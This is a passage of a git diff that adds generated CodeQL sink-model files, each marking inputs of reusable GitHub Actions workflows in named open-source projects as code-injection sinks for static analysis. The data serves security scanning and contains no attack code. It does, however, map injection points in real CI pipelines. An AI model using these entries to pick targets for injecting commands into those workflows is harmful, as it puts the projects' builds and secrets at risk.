b/actions/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.iosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.macosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.androidBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml new file mode 100644 index 000000000000..66bd5e8b99d7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.hub_base_path", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.pr_number", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.commit_sha", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.languages", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.version_tag_suffix", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.additional_args", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml new file mode 100644 index 000000000000..fc0d7a48ca31 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml new file mode 100644 index 000000000000..e3a048ee25cd --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.event_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml new file mode 100644 index 000000000000..db3fb546f0f6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml new file mode 100644 index 000000000000..3a1b8c8403ec --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml new file mode 100644 index 000000000000..9f633ceca2a3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml new file mode 100644 index 000000000000..96eb05c06992 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml new file mode 100644 index 000000000000..9448aaeabe1b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml new file mode 100644 index 000000000000..d9af00581aa1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml new file mode 100644 index 000000000000..aee71d38351f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml new file mode 100644 index 000000000000..cb06e03a0b20 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml new file mode 100644 index 000000000000..837ac52856bb --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.platform", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml new file mode 100644 index 000000000000..737350d2379e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -0,0 +1,23 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.base_image", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.model", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.variant", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "input.port", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml new file mode 100644 index 000000000000..3fd4d6157783 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml new file mode 100644 index 000000000000..caf13251f20f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml new file mode 100644 index 000000000000..2f8790197e1a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.images_tag", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.quay_org", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "input.target_branch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml new file mode 100644 index 000000000000..f51482fc02e4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml new file mode 100644 index 000000000000..67b335536ac9 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml new file mode 100644 index 000000000000..514fbac1d52f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.client", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "input.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml new file mode 100644 index 000000000000..6a578723d865 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml new file mode 100644 index 000000000000..14afd31d1524 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "input.FULL_MATRIX", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "input.matrix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml new file mode 100644 index 000000000000..772dd2e7c713 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.build_from", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "input.arch", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml new file mode 100644 index 000000000000..477e782dde65 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml new file mode 100644 index 000000000000..4d66b2854034 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.tar-file-name", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.whl-file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml new file mode 100644 index 000000000000..8bd5aacbd9b0 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml new file mode 100644 index 000000000000..cd1933d8a235 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "input.example_changed", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 000000000000..9e1b26e1a293 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml new file mode 100644 index 000000000000..4977c1d98817 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml new file mode 100644 index 000000000000..2fa4322aff4c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] + - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml new file mode 100644 index 000000000000..5f90523e8335 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_force_enable_stats", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_enable_assertions", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.build_shared_libs", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_build_type", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_cxx_compiler", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml new file mode 100644 index 000000000000..9ffbce337f49 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml new file mode 100644 index 000000000000..2182d445b831 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml new file mode 100644 index 000000000000..1928629382d5 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.docker_org", "code-injection", "generated"] \ No newline at end of file diff --git 